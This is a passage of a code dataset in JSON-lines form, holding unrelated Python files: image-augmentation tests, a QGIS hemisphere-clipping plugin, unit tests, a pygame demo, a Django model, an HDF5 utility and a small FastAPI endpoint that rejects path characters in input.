\"nvidia_tao_tf1.core.processors.augment.color.hue_saturation_matrix\",\n side_effect=color.hue_saturation_matrix,\n)\n@pytest.mark.parametrize(\"batch_size\", [None, 4])\ndef test_random_hue_saturation_matrix_samples_saturation(\n mocked_hue_saturation_matrix, mocked_random_uniform, batch_size\n):\n saturation = 0.42\n mocked_random_uniform.return_value = saturation\n color.random_hue_saturation_matrix(\n hue_rotation_max=0.0, saturation_shift_max=0.5, batch_size=batch_size\n )\n expected_shape = [] if batch_size is None else [batch_size]\n mocked_random_uniform.assert_called_with(expected_shape, minval=-0.5, maxval=0.5)\n mocked_hue_saturation_matrix.assert_called_with(mock.ANY, 1 + saturation)\n\n\n@mock.patch(\n \"nvidia_tao_tf1.core.processors.augment.color.contrast_matrix\",\n side_effect=lambda c, cs: (c, cs),\n)\n@pytest.mark.parametrize(\"batch_size\", [None, 4])\n@pytest.mark.parametrize(\"contrast_scale_max\", [0.0, 0.5, 1.0])\n@pytest.mark.parametrize(\"contrast_center\", [1.0 / 2.0, 255.0 / 2.0])\n@pytest.mark.parametrize(\"contrast_scale_center\", [0.0, 0.5, 1.0])\ndef test_random_contrast_matrix(\n patched, batch_size, contrast_scale_max, contrast_center, contrast_scale_center\n):\n \"\"\"Test that random_contrast_matrix produces correct distributions.\"\"\"\n set_random_seed(42)\n contrast_scale_tensor, contrast_center_value = color.random_contrast_matrix(\n contrast_scale_max,\n contrast_center,\n batch_size=batch_size,\n scale_center=contrast_scale_center,\n )\n contrast_scales = sample_tensors([contrast_scale_tensor], NUM_SAMPLES)\n\n assert_truncated_normal_distribution(\n contrast_scales, mean=contrast_scale_center, stddev=contrast_scale_max / 2.0\n )\n\n assert contrast_center == contrast_center_value\n\n\n@mock.patch(\n \"nvidia_tao_tf1.core.processors.augment.color.brightness_offset_matrix\",\n side_effect=lambda offset: offset,\n)\n@pytest.mark.parametrize(\"batch_size\", [None, 4])\n@pytest.mark.parametrize(\"brightness_scale_max\", [0.0, 0.5, 1.0])\n@pytest.mark.parametrize(\"brightness_uniform_across_channels\", [True, False])\n@pytest.mark.parametrize(\"brightness_center\", [-0.5, 0.0, 0.5])\ndef test_random_brightness_matrix(\n patched,\n batch_size,\n 
brightness_scale_max,\n brightness_uniform_across_channels,\n brightness_center,\n):\n \"\"\"Test that random_brightness_matrix produces correct distributions.\"\"\"\n set_random_seed(42)\n brightness_scale_tensor = color.random_brightness_matrix(\n brightness_scale_max,\n brightness_uniform_across_channels,\n batch_size=batch_size,\n brightness_center=brightness_center,\n )\n\n brightness_scales = sample_tensors([brightness_scale_tensor], NUM_SAMPLES)\n brightness_scales = np.array(brightness_scales[0])\n\n assert_truncated_normal_distribution(\n brightness_scales, mean=brightness_center, stddev=brightness_scale_max / 2.0\n )\n\n if brightness_uniform_across_channels:\n # If ``brightness_uniform_across_channels`` is True, check that values for each channel\n # match. This is done by subtracting value of red channel from all channels and checking\n # that result is zero.\n if batch_size is None:\n assert all(\n [\n np.allclose(brightness_scales[i, :] - brightness_scales[i, 0], 0.0)\n for i in xrange(len(brightness_scales))\n ]\n )\n else:\n for b in xrange(len(brightness_scales)):\n assert all(\n [\n np.allclose(\n brightness_scales[b, i, :] - brightness_scales[b, i, 0], 0.0\n )\n for i in xrange(len(brightness_scales[b]))\n ]\n )\n elif brightness_scale_max > 0.0:\n # If ``brightness_uniform_across_channels`` is False, check that values across channels\n # differ. This is done by negating the test for ``brightness_uniform_across_channels`` True.\n # Note that we do not check the red channel after subtracting the red channel value,\n # since that is always zero. Similarly, values will be all zero and hence the same\n # if ``brightness_scale_max`` == 0.0.\n if batch_size is None:\n assert all(\n [\n not np.allclose(\n brightness_scales[i, 1:] - brightness_scales[i, 0], 0.0\n )\n for i in xrange(len(brightness_scales))\n ]\n )\n else:\n for b in xrange(len(brightness_scales)):\n assert all(\n [\n not np.allclose(\n brightness_scales[b, i, 1:] - brightness_scales[b, i, 0],\n 0.0,\n )\n for i in xrange(len(brightness_scales[b]))\n ]\n )\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 4])\n@pytest.mark.parametrize(\n \"hue_rotation_max, saturation_shift_max, contrast_scale_max, \"\n \"brightness_scale_max, brightness_uniform_across_channels\",\n [\n (0, 0, 0, 0, True),\n (0, 0, 0, 0, False),\n (0, 0, 0, 0.5, True),\n (0, 0, 0, 0.5, False),\n ],\n)\ndef test_get_random_color_transformation_matrix(\n batch_size,\n hue_rotation_max,\n saturation_shift_max,\n contrast_scale_max,\n brightness_scale_max,\n brightness_uniform_across_channels,\n):\n \"\"\"\n Test generating a random color transform matrix.\n \"\"\"\n set_random_seed(42)\n # No linter approved way to break up the brightness_uniform_across_channels=\n # brightness_uniform_across_channels line and maintain indentation, so using\n # a dummy variable.\n uniform_bright = brightness_uniform_across_channels\n ctm = color.get_random_color_transformation_matrix(\n hue_rotation_max=hue_rotation_max,\n saturation_shift_max=saturation_shift_max,\n contrast_scale_max=contrast_scale_max,\n contrast_center=0.5,\n brightness_scale_max=brightness_scale_max,\n brightness_uniform_across_channels=uniform_bright,\n batch_size=batch_size,\n )\n ctm_np = tf.compat.v1.Session().run(ctm)\n if brightness_scale_max > 0:\n if batch_size is None:\n ctm = ctm_np[3, 0:3]\n else:\n ctm = ctm_np[:, 3, 0:3]\n if brightness_uniform_across_channels:\n # Tests that the first three values in the last row of the transform matrix\n # (the offset channels) have the 
same value.\n np.testing.assert_allclose(\n np.sum(np.diff(ctm)),\n 0,\n atol=1e-2,\n err_msg=\"color transform matrix is not correctly \"\n \"generated when brightness is uniform.\",\n )\n else:\n # Tests that the first three values in the last row of the transform matrix\n # (the offset channels) have different values.\n np.testing.assert_equal(\n np.not_equal(np.sum(np.diff(ctm)), 0),\n True,\n err_msg=\"color transform matrix is not correctly \"\n \"generated when brightness is not uniform.\",\n )\n else:\n np.testing.assert_allclose(\n identity_color_matrix(batch_size),\n ctm_np,\n atol=1e-2,\n err_msg=\"color transform matrix is not correctly generated.\",\n )\n\n\ndef test_no_op_color_transform():\n \"\"\"Tests that supplying no kwargs results in an almost-no-op color transformation matrix.\"\"\"\n ctm = color.get_random_color_transformation_matrix()\n ctm_np = tf.compat.v1.Session().run(ctm)\n # 'Almostness' comes from saturation matrix.\n np.testing.assert_allclose(\n ctm_np,\n np.eye(4),\n atol=2e-3,\n verbose=True,\n err_msg=\"Default color transformation matrix is too 'far' from the identity matrix.\",\n )\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/core/processors/augment/test_color_matrices.py","file_name":"test_color_matrices.py","file_ext":"py","file_size_in_byte":20129,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"35589508386","text":"def divisors(i, A_set,A_dict):\n #print \"i = \", i\n list_len = 0\n for a in range(1, int(i ** .5) + 1):\n #print \"a = \", a\n if i %a == 0:\n #print \"found divisor\"\n if a in A_set:\n #print \"found in list\"\n list_len += A_dict[a]\n if i / a != a:\n #print \"found 2nd divisor\"\n if i / a in A_set:\n list_len += A_dict[i / a]\n #print \"list_len = \", list_len\n return list_len\n \n \ndef solution(A):\n # write your code in Python 2.7\n A_set = set(A)\n A_dict = {}\n div_dict = {}\n A_len = len(A)\n for item in A:\n if item in A_dict:\n A_dict[item] += 1\n else:\n A_dict[item] = 1\n out = []\n for item in A:\n if item in div_dict:\n difference_len = div_dict[item]\n else:\n difference_len = divisors(item,A_set, A_dict)\n div_dict[item] = difference_len\n count = 0\n #for i in difference_set:\n # count += A_dict[i]\n out.append(A_len - difference_len)\n return out\n\n","repo_name":"agileminor/shared_files","sub_path":"exercises/count_non_div.py","file_name":"count_non_div.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19314618227","text":"__author__ = 'Juernjakob Dugge'\n__date__ = 'September 2020'\n__copyright__ = '(C) 2020, Juernjakob Dugge'\n\nimport os\n\nfrom qgis.core import (\n QgsApplication,\n QgsProcessing,\n QgsProcessingParameterFeatureSource,\n QgsProcessingParameterNumber,\n QgsProcessingProvider,\n QgsCoordinateReferenceSystem,\n QgsVectorLayer,\n QgsFeature,\n QgsGeometry,\n QgsCoordinateTransform,\n QgsPointXY,\n QgsProject,\n QgsProcessingParameterVectorDestination\n)\n\nfrom processing.algs.qgis.QgisAlgorithm import QgisAlgorithm\nimport processing\nimport numpy as np\nimport cmath\n\npluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]\n\n\nclass ClipToHemisphereProvider(QgsProcessingProvider):\n \n def __init__(self):\n QgsProcessingProvider.__init__(self)\n \n def unload(self):\n pass\n \n def loadAlgorithms(self):\n self.addAlgorithm(ClipToHemisphereAlgorithm())\n \n def id(self):\n \"\"\"\n 
Returns the unique provider id, used for identifying the provider. This\n string should be a unique, short, character only string, e.g. \"qgis\" or\n \"gdal\". This string should not be localised.\n \"\"\"\n return 'Clip to hemisphere'\n \n def name(self):\n \"\"\"\n Returns the provider name, which is used to describe the provider\n within the GUI.\n\n This string should be short (e.g. \"Lastools\") and localised.\n \"\"\"\n return self.tr('Clip to hemisphere')\n \n def longName(self):\n \"\"\"\n Returns a longer version of the provider name, which can include\n extra details such as version numbers. E.g. \"Lastools LIDAR tools\n (version 2.2.1)\". This string should be localised. The default\n implementation returns the same string as name().\n \"\"\"\n return self.name()\n\n\nclass ClipToHemispherePlugin(object):\n def __init__(self):\n self.provider = None\n \n def initProcessing(self):\n self.provider = ClipToHemisphereProvider()\n QgsApplication.processingRegistry().addProvider(self.provider)\n \n def initGui(self):\n self.initProcessing()\n \n def unload(self):\n QgsApplication.processingRegistry().removeProvider(self.provider)\n\n\nclass ClipToHemisphereAlgorithm(QgisAlgorithm):\n INPUT = 'INPUT'\n OUTPUT = 'OUTPUT'\n CENTER_LATITUDE = 'CENTER_LATITUDE'\n CENTER_LONGITUDE = 'CENTER_LONGITUDE'\n SEGMENTS = 'SEGMENTS'\n \n def __init__(self):\n super().__init__()\n \n def initAlgorithm(self, config=None):\n self.addParameter(\n QgsProcessingParameterFeatureSource(\n self.INPUT,\n self.tr('Input layer'),\n [QgsProcessing.TypeVectorAnyGeometry]\n )\n )\n \n self.addParameter(\n QgsProcessingParameterVectorDestination(\n self.OUTPUT,\n self.tr('Output layer')\n )\n )\n \n param = QgsProcessingParameterNumber(\n self.CENTER_LATITUDE,\n self.tr('Center latitude'),\n type=QgsProcessingParameterNumber.Double,\n minValue=-90,\n maxValue=90\n )\n param.setMetadata({'widget_wrapper':\n {'decimals': 1}\n })\n self.addParameter(param)\n \n param = QgsProcessingParameterNumber(\n self.CENTER_LONGITUDE,\n self.tr('Center longitude'),\n type=QgsProcessingParameterNumber.Double,\n minValue=-180,\n maxValue=180\n )\n param.setMetadata({'widget_wrapper':\n {'decimals': 1}\n })\n self.addParameter(param)\n \n self.addParameter(QgsProcessingParameterNumber(\n self.SEGMENTS,\n self.tr('Segments'),\n defaultValue=720,\n minValue=3,\n type=QgsProcessingParameterNumber.Integer\n ))\n \n def name(self):\n return 'cliptohemisphere'\n \n def displayName(self):\n return self.tr('Clip to hemisphere')\n \n def processAlgorithm(self, parameters, context, feedback):\n source = self.parameterAsSource(parameters, self.INPUT, context)\n sourceCrs = source.sourceCrs()\n centerLatitude = self.parameterAsDouble(parameters,\n self.CENTER_LATITUDE, context)\n centerLongitude = self.parameterAsDouble(parameters,\n self.CENTER_LONGITUDE, context)\n segments = self.parameterAsInt(parameters, self.SEGMENTS, context)\n \n earthRadius = 6371000\n targetProjString = \"+proj=ortho +lat_0=\" + str(centerLatitude) + \\\n \" +lon_0=\" + str(centerLongitude) + \\\n \" +x_0=0 +y_0=0 +a=\" + str(earthRadius) + \\\n \" +b=\" + str(earthRadius) + \\\n \" +units=m +no_defs\"\n targetCrs = QgsCoordinateReferenceSystem()\n targetCrs.createFromProj(targetProjString)\n \n transformTargetToSrc = QgsCoordinateTransform(targetCrs,\n sourceCrs,\n QgsProject.instance()).transform\n transformSrcToTarget = QgsCoordinateTransform(sourceCrs,\n targetCrs,\n QgsProject.instance()).transform\n clipLayer = QgsVectorLayer(\"MultiPolygon\", \"clipLayer\", 
\"memory\")\n pr = clipLayer.dataProvider()\n \n # Handle edge cases:\n # Hemisphere centered on the equator\n if centerLatitude == 0:\n # Hemisphere centered on the equator and including the antimeridian\n if abs(centerLongitude) >= 90:\n edgeEast = -180 - np.sign(centerLongitude) * \\\n (180 - abs(centerLongitude)) + 90\n edgeWest = 180 - np.sign(centerLongitude) * \\\n (180 - abs(centerLongitude)) - 90\n circlePoints = [[\n [QgsPointXY(-180.01, latitude) for\n latitude in np.linspace(90, -90, segments // 8)] +\n [QgsPointXY(longitude, -90) for longitude in\n np.linspace(-180, edgeEast, segments // 8)] +\n [QgsPointXY(edgeEast, latitude) for latitude in\n np.linspace(-90, 90, segments // 8)] +\n [QgsPointXY(longitude, 90) for longitude in\n np.linspace(edgeEast, -180, segments // 8)]\n ],\n [\n [QgsPointXY(edgeWest, latitude) for latitude in\n np.linspace(90, -90, segments // 8)] +\n [QgsPointXY(longitude, -90) for longitude in\n np.linspace(edgeWest, 180, segments // 8)] +\n [QgsPointXY(180.01, latitude) for\n latitude in np.linspace(-90, 90, segments // 8)] +\n [QgsPointXY(longitude, 90) for longitude in\n np.linspace(180, edgeWest, segments // 8)]\n ]]\n # Hemisphere centered on the equator not including the antimeridian\n else:\n edgeWest = centerLongitude - 90\n edgeEast = centerLongitude + 90\n circlePoints = [[\n [QgsPointXY(edgeWest, latitude) for latitude in\n np.linspace(90, -90, segments // 4)] +\n [QgsPointXY(longitude, -90) for longitude in\n np.linspace(edgeWest, edgeEast, segments // 4)] +\n [QgsPointXY(edgeEast, latitude) for\n latitude in np.linspace(-90, 90, segments // 4)] +\n [QgsPointXY(longitude, 90) for longitude in\n np.linspace(edgeEast, edgeWest, segments // 4)]\n ]]\n # Hemisphere centered on one of the poles\n elif abs(centerLatitude) == 90:\n circlePoints = [[\n [QgsPointXY(-180.01, latitude) for latitude in\n np.linspace(45 + 0.5 * centerLatitude,\n -45 + 0.5 * centerLatitude,\n segments // 4)] +\n [QgsPointXY(longitude, -45 + 0.5 * centerLatitude)\n for longitude in\n np.linspace(-180, 180, segments // 4)] +\n [QgsPointXY(180.01, latitude) for latitude in\n np.linspace(-45 + 0.5 * centerLatitude,\n 45 + 0.5 * centerLatitude,\n segments // 4)] +\n [QgsPointXY(longitude, 45 + 0.5 * centerLatitude) for longitude\n in\n np.linspace(180, -180, segments // 4)]\n ]]\n # All other hemispheres\n else:\n # Create a circle in the orthographic projection, convert the\n # circle coordinates to the source CRS\n angles = np.linspace(0, 2 * np.pi, segments, endpoint=False)\n circlePoints = np.array([\n transformTargetToSrc(\n QgsPointXY(np.cos(angle) * earthRadius * 0.9999,\n np.sin(angle) * earthRadius * 0.9999)\n ) for angle in angles\n ])\n \n # Sort the projected circle coordinates from west to east\n sortIdx = np.argsort(circlePoints[:, 0])\n circlePoints = circlePoints[sortIdx, :]\n circlePoints = [[[QgsPointXY(point[0], point[1])\n for point in circlePoints]]]\n \n # Find the circle point in the orthographic projection that lies\n # on the antimeridian by linearly interpolating the angles of the\n # first and last coordinates\n startGap = 180 + circlePoints[0][0][0][0]\n endGap = 180 - circlePoints[0][0][-1][0]\n totalGap = startGap + endGap\n startCoordinates = transformSrcToTarget(circlePoints[0][0][0])\n endCoordinates = transformSrcToTarget(circlePoints[0][0][-1])\n startAngle = np.arctan2(startCoordinates[0], startCoordinates[1])\n endAngle = np.arctan2(endCoordinates[0], endCoordinates[1])\n antimeridianAngle = cmath.phase(\n endGap / totalGap * cmath.rect(1, 
startAngle) +\n startGap / totalGap * cmath.rect(1, endAngle))\n antimeridianPoint = transformTargetToSrc(QgsPointXY(\n np.sin(antimeridianAngle) * earthRadius * 0.9999,\n np.cos(antimeridianAngle) * earthRadius * 0.9999\n ))\n \n # Close the polygon\n circlePoints[0][0].extend(\n [QgsPointXY(180.01, latitude) for latitude in\n np.linspace(antimeridianPoint[1],\n np.sign(centerLatitude) * 90, segments // 4)] +\n [QgsPointXY(-180.01, latitude) for latitude in\n np.linspace(np.sign(centerLatitude) * 90,\n antimeridianPoint[1], segments // 4)]\n )\n \n # Create the feature and add it to the layer\n circle = QgsFeature()\n circle.setGeometry(QgsGeometry.fromMultiPolygonXY(circlePoints))\n \n pr.addFeatures([circle])\n \n result = processing.run('native:intersection', {\n 'INPUT': parameters['INPUT'],\n 'OVERLAY': clipLayer,\n 'OUTPUT': parameters['OUTPUT']\n }, is_child_algorithm=True, context=context, feedback=feedback)\n \n return {self.OUTPUT: result['OUTPUT']}\n","repo_name":"jdugge/ClipToHemisphere","sub_path":"ClipToHemisphere.py","file_name":"ClipToHemisphere.py","file_ext":"py","file_size_in_byte":11850,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"5378737026","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../..\"))\nimport unittest\nfrom design.trie import Trie\n\nclass TestTimeMap(unittest.TestCase):\n def test_1(self):\n ops = [\"Trie\",\"insert\",\"search\",\"search\",\"startsWith\",\"insert\",\"search\"]\n params = [[],[\"apple\"],[\"apple\"],[\"app\"],[\"app\"],[\"app\"],[\"app\"]]\n null, true, false = None, True, False\n expected = [null,null,true,false,true,null,true]\n func = eval(ops[0])(*params[0])\n result = [None]\n for op, param in zip(ops[1:], params[1:]):\n result.append(getattr(func, op)(*param))\n self.assertEqual(result, expected)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/test/design_test/test_trie.py","file_name":"test_trie.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30060928862","text":"# Search for a target string.\n# Have the user input something to search for.\n# Put this into a while loop with 'x' to end the search\n# 0 1 2\narr = [\"hat\", \"watch\", \"baseball\", \"car\", \"pen\", \"disk\", \"glasses\"]\nprint(\"Searching the list: \", arr)\ntarg=\"\"\nwhile (True):\n targ = input(\"Enter item to search or 'x' to finish: \")\n if targ == \"x\":\n break\n print(\"Searching for \" + targ)\n found = False\n i=0\n while (i -20: xp[i] = xp[i] - 1\n if mx > cx[i] and xp[i] < 20: xp[i] = xp[i] + 1\n if my < cy[i] and yp[i] > -16: yp[i] = yp[i] - 1\n if my > cy[i] and yp[i] < 16: yp[i] = yp[i] + 1\n cx[i] = cx[i] + xp[i]\n cy[i] = cy[i] + yp[i]\n pygame.draw.circle(screen, (0, 64, 192), [cx[i], cy[i]], 12)\n pygame.draw.circle(screen, (0, 128, 224), [cx[i], cy[i]], 9)\n pygame.draw.circle(screen, (192, 224, 255), [cx[i], cy[i]], 6)\n\n pygame.display.update()\n clock.tick(30)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jpub/PythonGame_1","sub_path":"Chapter11/column11.py","file_name":"column11.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"73609830567","text":"#!/usr/bin/env python\n\nimport os\nfrom pandas import *\nimport numpy as np\nfrom multiprocessing 
import Process, current_process, Pool\nfrom collections import defaultdict, Counter\nimport pickle\nimport json\nfrom datetime import *\nfrom pylab import *\nfrom scipy.stats import itemfreq\nimport timeit\nimport testCases\nimport dischargingRate as dr\n\n\ndef getDataDumpForAll():\n\tall_data = dr.doInPool(132)\n\treturn all_data\n\n\ndef graphDischargeSpan():\n\tall_data = getDataDumpForAll()\n\tresult = []\n\tfor i in range(len(all_data)):\n\t\tdev = next(iter(all_data[i]))\n\t\t#if dev == '2927a38a4daa0872371e822effc1499098f5fd9b':\n\t\t#\tcontinue\n\t\tdata_ = all_data[i][dev]\n\t\tx = []\n\t\tfor each in data_.keys():\n\t\t\tslist = sorted(data_[each], key = lambda x: x[0])\n\t\t\tspan = (slist[-1][0] - slist[0][0]).total_seconds()/60\n\t\t\tdrop = slist[0][1] - slist[-1][1]\n\t\t\t#x.append(round(span,3))\n\t\t\tif (span < 5 and drop < 2) or span > 10000:\n\t\t\t\tprint(dev, '---', round(span, 2), drop)\n\t\t\t\tcontinue\n\t\t\tx.append(round(span,2))\n\t\t\t\n\t\tresult.append(x)\n\tslist = sorted(result, key=lambda x: np.mean(x))\n\tfig, ax = plt.subplots()\n\tbp = ax.boxplot(slist, sym='',whis=[25,75],patch_artist = True)\n\tfor box in bp['boxes']:\n\t\tbox.set(color='#FFFFFF', linewidth=1)\n\t\tbox.set(facecolor='#c0c0c0')\n\tfor median in bp['medians']:\n\t\tmedian.set(color='#FF0000', linewidth=3)\n\tax.tick_params(labelbottom='off')\n\tax.set_ylabel('Discharging span in minutes')\n\tax.set_xlabel('Users')\n\tfig.show()\n\ndef loadDeviceOne(dev):\n\tfilename = '/home/anudipa/Documents/Jouler_Extra/final/shortlisted/'+dev+'.p'\n\ttry:\n\t\tdDataset = pickle.load(open(filename,'rb'), encoding='bytes')\n\t\tdevice = next(iter(dDataset))\n\t\t\n\t\tprint(dDataset[dev].keys())\t\n\texcept Exception as e:\n\t\tprint('Error',e)\n","repo_name":"anudipa/usage-pattern","sub_path":"allGraphsForReport.py","file_name":"allGraphsForReport.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18247172473","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom model_utils.models import TimeStampedModel\n\nfrom visibility.models import VisibilityField, VisibilityManager\n\n\nclass PaymentMethod(TimeStampedModel):\n objects = VisibilityManager()\n name = models.CharField(\n max_length=255,\n verbose_name=_('field-name'),\n help_text=_('field-name-help-text'),\n )\n description = models.TextField(\n help_text=_('field-description-help-text'),\n )\n needs_account_info = models.BooleanField(\n default=False,\n help_text=_('field-payment-method-need-account-info-help-text'),\n )\n price = models.PositiveIntegerField(\n default=0,\n verbose_name=_('field-price'),\n help_text=_('field-method-price-help-text'),\n )\n weight = models.PositiveIntegerField(\n default=0,\n verbose_name=_('field-weight'),\n help_text=_('field-weight-help-text'),\n )\n visibility = VisibilityField()\n\n class Meta:\n verbose_name = _('Payment Method')\n verbose_name_plural = _('Payment Methods')\n\n def __str__(self):\n return self.name\n","repo_name":"just-paja/malickosti-v-akvarelkach","sub_path":"eshop/models/payment_method.py","file_name":"payment_method.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35743473121","text":"import h5py as h5\nimport cv2\nimport numpy as np\nfrom pathlib import Path\nfrom PIL import Image\n\ndef extract_labels(list_obj):\n ships = []\n 
not_ships = []\n\n for path in list_obj:\n label = int(str(path).split('/')[1][0])\n if label ==1:\n ships.append(str(path))\n else:\n not_ships.append(str(path))\n return(ships,not_ships)\n\ndef get_list_paths(path):\n path_to_images = Path(path)\n generator_paths = path_to_images.glob('*.png')\n print(\"This is a Path object\",type(path_to_images))\n print(\"This is a Generator object\", type(generator_paths))\n list_paths = list(generator_paths)\n\n return list_paths\n\n\ndef create_h5(path):\n\n list_paths = get_list_paths(path)\n total_images = len(list_paths)\n print(\"The total number of images is: \",total_images)\n\n ship,no_ship = extract_labels(list_paths)\n img_dim = cv2.imread(ship[0]).shape\n\n print(\"The dimensions of the images are: \",img_dim)\n\n dim1,dim2,dim3 = img_dim[0],img_dim[1],img_dim[2]\n h5_ship_shape = (len(ship),dim1,dim2,dim3)\n h5_no_ship_shape = (len(no_ship),dim1,dim2,dim3)\n print(\"The shape of the ship dataset is:\", h5_ship_shape)\n print(\"The shape of the no_ship dataset is:\", h5_no_ship_shape)\n with h5.File('data.hdf5', 'w') as f:\n g1 = f.create_group('ships')\n d1 = g1.create_dataset('data',h5_ship_shape)\n for i in range(0,len(ship)):\n d1[i] = cv2.imread(str(ship[i]))\n\n g2= f.create_group('no_ships')\n d2 = g2.create_dataset('data',h5_no_ship_shape)\n for i in range(0,len(no_ship)):\n d2[i] = cv2.imread(no_ship[i])\n\n print(\"The name of the ships dataset is \",d1.name)\n print(\"The name of the no_ships dataset is \",d2.name)\n f.close()\n\ndef load_dataset():\n with h5.File('data.hdf5', \"r\") as f:\n print(\"The hdf5 file acts as a big dictionary where the groups are the keys:\",f.keys())\n\n print(\"Each group has a dataset associated with it:\",f['ships'].keys(),f['no_ships'].keys())\n positive_cases = f['ships']['data'][:]\n negative_cases = f['no_ships']['data'][:]\n print(\"Images are stored as numpy arrays:\",type(positive_cases))\n print(\"The shape of the positive cases is:\",positive_cases.shape)\n print(\"The shape of the negative cases is:\",negative_cases.shape)\n print(\"Checking one element of each dataset\",positive_cases[0].shape,negative_cases[0].shape)\n f.close()\n\n return positive_cases, negative_cases\n\ncreate_h5('./shipsnet/')\n##load_dataset()\n","repo_name":"jjpd777/h5_utils","sub_path":"create_h5.py","file_name":"create_h5.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"991250249","text":"from fastapi import FastAPI\nfrom fastapi import HTTPException\n\napp = FastAPI()\n\nbad_characters = ['../', './', '/', '\\\\', ':', '*', '?', '\"', '<', '>', '|']\n\n@app.get(\"/test/document\")\nasync def test_document(document: str):\n# Send the document\n if any(char in document for char in bad_characters):\n raise HTTPException(status_code=400, detail=\"Document contains invalid characters\")\n return {\"document\": document}","repo_name":"NidhalKhalfallah/Snippets-scan","sub_path":"CWEs/Python/ChatGPT/CWE-843 Scenario 2 Python.py","file_name":"CWE-843 Scenario 2 Python.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73607833448","text":"import unittest\nimport core\nimport patterns\nimport main\n\n\nclass PatternTests(object):\n\n pclass = None\n\n def test_can_construct(self):\n self.pclass()\n \n def test_raises_error_on_early_render(self):\n p = self.pclass()\n with self.assertRaises(core.PatternStateError):\n p.render()\n\n def 
find_with(self,items,properties,value=None):\n if not isinstance(properties,dict):\n properties = {properties: value}\n for i in items:\n for k,v in properties.items():\n try:\n if getattr(i,k) != v: break\n except AttributeError: break\n else:\n return i\n expstr = \"[\" + \", \".join([\"%s=%s\" % tuple(map(str,p)) for p in properties.items()]) + \"]\"\n actstr = \", \".join([( \"[\" +\n \", \".join([\"%s=%s\" % (k,str(getattr(i,k,\"\"))) for k in properties.keys()]) \n + \"]\" ) for i in items ])\n self.fail(\"%s not found in items %s\" % (expstr,actstr)) \n \n def find_type(self,items,type):\n l = list(filter(lambda x: isinstance(x,type), items))\n if len(l) == 0:\n self.fail(\"No %ss in %s\" % (str(type),str(items)))\n return l\n\n\ndef feed_input(pattern,row,col,characters):\n for char in characters:\n pattern.test(main.CurrentChar(row,col,char,core.M_NONE))\n col += 1\n\n\n\n","repo_name":"Frimkron/Ascidia","sub_path":"tests/ptests.py","file_name":"ptests.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"53"} +{"seq_id":"34687691198","text":"import json\nimport requests\nfrom addr import *\n\n\ntext = 'Новости'\n\nlenght = {'title': 30,\n 'type': 10,\n 'id': 10,\n 'description': 2000\n }\n\nengine = movix_showcases\n\n\ndef movix_search_request():\n r = requests.get(engine['addr'],\n headers=engine['headers'],\n params={'text': text},\n timeout=25)\n print(f'Request:\\n{r.request.url}\\n'.replace('\\'', '\"'))\n\n if r.status_code != 200:\n print(r.status_code, r.text, r.headers)\n return False\n else:\n # Check the received response for results\n result = r.json()['data']['showcases']\n\n if not result:\n print('NO RESULTS')\n return False\n print(f\"Request execution time: {r.elapsed.total_seconds()}\")\n # print(f\"Total results: {r.json()['data']['total']}\\n\")\n\n fields = [k for k, v in lenght.items() if v]\n field_format = ''\n for field in fields:\n field_format = field_format + '{:<' + str(lenght[field] + 4) + '}'\n fields_line = [str(field)[:lenght[field]] for field in fields]\n\n print(field_format.format(*fields_line))\n\n for showcase in result:\n print(f'\\n-------------------------------------------- {showcase[\"title\"]} ({showcase[\"total\"]})--------------------------------------------\\n')\n for item in showcase['items']:\n # print(item)\n if item['type'] not in ('schedule', ):\n asset = [str(item[field])[:lenght[field]] for field in fields]\n else:\n asset = [str(item['data'][field])[:lenght[field]] for field in fields]\n print(field_format.format(*asset))\n\n\nif __name__ == '__main__':\n movix_search_request()\n","repo_name":"dmvProjects/VoiceSearch","sub_path":"movix_showcases.py","file_name":"movix_showcases.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41770851204","text":"import pickle\r\n\r\n# Load A.I. 
